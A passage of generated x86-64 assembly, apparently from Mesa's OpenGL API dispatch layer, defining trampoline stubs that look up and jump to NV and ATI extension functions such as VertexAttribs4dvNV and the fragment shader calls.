.globl GL_PREFIX(VertexAttribs4dvNV)
.type GL_PREFIX(VertexAttribs4dvNV), @function
GL_PREFIX(VertexAttribs4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4dvNV), .-GL_PREFIX(VertexAttribs4dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4fvNV)
.type GL_PREFIX(VertexAttribs4fvNV), @function
GL_PREFIX(VertexAttribs4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5712(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4fvNV), .-GL_PREFIX(VertexAttribs4fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4svNV)
.type GL_PREFIX(VertexAttribs4svNV), @function
GL_PREFIX(VertexAttribs4svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4svNV), .-GL_PREFIX(VertexAttribs4svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs4ubvNV)
.type GL_PREFIX(VertexAttribs4ubvNV), @function
GL_PREFIX(VertexAttribs4ubvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs4ubvNV), .-GL_PREFIX(VertexAttribs4ubvNV)
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp1ATI)
.type GL_PREFIX(AlphaFragmentOp1ATI), @function
GL_PREFIX(AlphaFragmentOp1ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp1ATI), .-GL_PREFIX(AlphaFragmentOp1ATI)
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp2ATI)
.type GL_PREFIX(AlphaFragmentOp2ATI), @function
GL_PREFIX(AlphaFragmentOp2ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5744(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp2ATI), .-GL_PREFIX(AlphaFragmentOp2ATI)
.p2align 4,,15
.globl GL_PREFIX(AlphaFragmentOp3ATI)
.type GL_PREFIX(AlphaFragmentOp3ATI), @function
GL_PREFIX(AlphaFragmentOp3ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5752(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AlphaFragmentOp3ATI), .-GL_PREFIX(AlphaFragmentOp3ATI)
.p2align 4,,15
.globl GL_PREFIX(BeginFragmentShaderATI)
.type GL_PREFIX(BeginFragmentShaderATI), @function
GL_PREFIX(BeginFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 5760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5760(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 5760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BeginFragmentShaderATI), .-GL_PREFIX(BeginFragmentShaderATI)
.p2align 4,,15
.globl GL_PREFIX(BindFragmentShaderATI)
.type GL_PREFIX(BindFragmentShaderATI), @function
GL_PREFIX(BindFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5768(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindFragmentShaderATI), .-GL_PREFIX(BindFragmentShaderATI)
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp1ATI)
.type GL_PREFIX(ColorFragmentOp1ATI), @function
GL_PREFIX(ColorFragmentOp1ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5776(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp1ATI), .-GL_PREFIX(ColorFragmentOp1ATI)
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp2ATI)
.type GL_PREFIX(ColorFragmentOp2ATI), @function
GL_PREFIX(ColorFragmentOp2ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5784(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp2ATI), .-GL_PREFIX(ColorFragmentOp2ATI)
.p2align 4,,15
.globl GL_PREFIX(ColorFragmentOp3ATI)
.type GL_PREFIX(ColorFragmentOp3ATI), @function
GL_PREFIX(ColorFragmentOp3ATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5792(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorFragmentOp3ATI), .-GL_PREFIX(ColorFragmentOp3ATI)
.p2align 4,,15
.globl GL_PREFIX(DeleteFragmentShaderATI)
.type GL_PREFIX(DeleteFragmentShaderATI), @function
GL_PREFIX(DeleteFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5800(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteFragmentShaderATI), .-GL_PREFIX(DeleteFragmentShaderATI)
.p2align 4,,15
.globl GL_PREFIX(EndFragmentShaderATI)
.type GL_PREFIX(EndFragmentShaderATI), @function
GL_PREFIX(EndFragmentShaderATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 5808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5808(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 5808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EndFragmentShaderATI), .-GL_PREFIX(EndFragmentShaderATI)
.p2align 4,,15
.globl GL_PREFIX(GenFragmentShadersATI)
.type GL_PREFIX(GenFragmentShadersATI), @function
GL_PREFIX(GenFragmentShadersATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5816(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenFragmentShadersATI), .-GL_PREFIX(GenFragmentShadersATI)
.p2align 4,,15
.globl GL_PREFIX(PassTexCoordATI)
.type GL_PREFIX(PassTexCoordATI), @function
GL_PREFIX(PassTexCoordATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5824(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PassTexCoordATI), .-GL_PREFIX(PassTexCoordATI)
.p2align 4,,15
.globl GL_PREFIX(SampleMapATI)
.type GL_PREFIX(SampleMapATI), @function
GL_PREFIX(SampleMapATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5832(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SampleMapATI), .-GL_PREFIX(SampleMapATI)
.p2align 4,,15
.globl GL_PREFIX(SetFragmentShaderConstantATI)
.type GL_PREFIX(SetFragmentShaderConstantATI), @function
GL_PREFIX(SetFragmentShaderConstantATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5840(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SetFragmentShaderConstantATI), .-GL_PREFIX(SetFragmentShaderConstantATI)
.p2align 4,,15
.globl GL_PREFIX(PointParameteriNV)
.type GL_PREFIX(PointParameteriNV), @function
GL_PREFIX(PointParameteriNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5848(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameteriNV), .-GL_PREFIX(PointParameteriNV)
.p2align 4,,15
.globl GL_PREFIX(PointParameterivNV)
.type GL_PREFIX(PointParameterivNV), @function
GL_PREFIX(PointParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5856(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameterivNV), .-GL_PREFIX(PointParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_733)
.type GL_PREFIX(_dispatch_stub_733), @function
HIDDEN(GL_PREFIX(_dispatch_stub_733))
GL_PREFIX(_dispatch_stub_733):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5864(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_733), .-GL_PREFIX(_dispatch_stub_733)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_734)
.type GL_PREFIX(_dispatch_stub_734), @function
HIDDEN(GL_PREFIX(_dispatch_stub_734))
GL_PREFIX(_dispatch_stub_734):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5872(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_734), .-GL_PREFIX(_dispatch_stub_734)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_735)
.type GL_PREFIX(_dispatch_stub_735), @function
HIDDEN(GL_PREFIX(_dispatch_stub_735))
GL_PREFIX(_dispatch_stub_735):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5880(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_735), .-GL_PREFIX(_dispatch_stub_735)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_736)
.type GL_PREFIX(_dispatch_stub_736), @function
HIDDEN(GL_PREFIX(_dispatch_stub_736))
GL_PREFIX(_dispatch_stub_736):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_736), .-GL_PREFIX(_dispatch_stub_736)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_737)
.type GL_PREFIX(_dispatch_stub_737), @function
HIDDEN(GL_PREFIX(_dispatch_stub_737))
GL_PREFIX(_dispatch_stub_737):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5896(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_737), .-GL_PREFIX(_dispatch_stub_737)
.p2align 4,,15
.globl GL_PREFIX(GetProgramNamedParameterdvNV)
.type GL_PREFIX(GetProgramNamedParameterdvNV), @function
GL_PREFIX(GetProgramNamedParameterdvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5904(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramNamedParameterdvNV), .-GL_PREFIX(GetProgramNamedParameterdvNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramNamedParameterfvNV)
.type GL_PREFIX(GetProgramNamedParameterfvNV), @function
GL_PREFIX(GetProgramNamedParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramNamedParameterfvNV), .-GL_PREFIX(GetProgramNamedParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4dNV)
.type GL_PREFIX(ProgramNamedParameter4dNV), @function
GL_PREFIX(ProgramNamedParameter4dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _x86_64_get_dispatch@PLT
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5920(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _glapi_get_dispatch
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4dNV), .-GL_PREFIX(ProgramNamedParameter4dNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4dvNV)
.type GL_PREFIX(ProgramNamedParameter4dvNV), @function
GL_PREFIX(ProgramNamedParameter4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4dvNV), .-GL_PREFIX(ProgramNamedParameter4dvNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4fNV)
.type GL_PREFIX(ProgramNamedParameter4fNV), @function
GL_PREFIX(ProgramNamedParameter4fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _x86_64_get_dispatch@PLT
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5936(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _glapi_get_dispatch
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4fNV), .-GL_PREFIX(ProgramNamedParameter4fNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4fvNV)
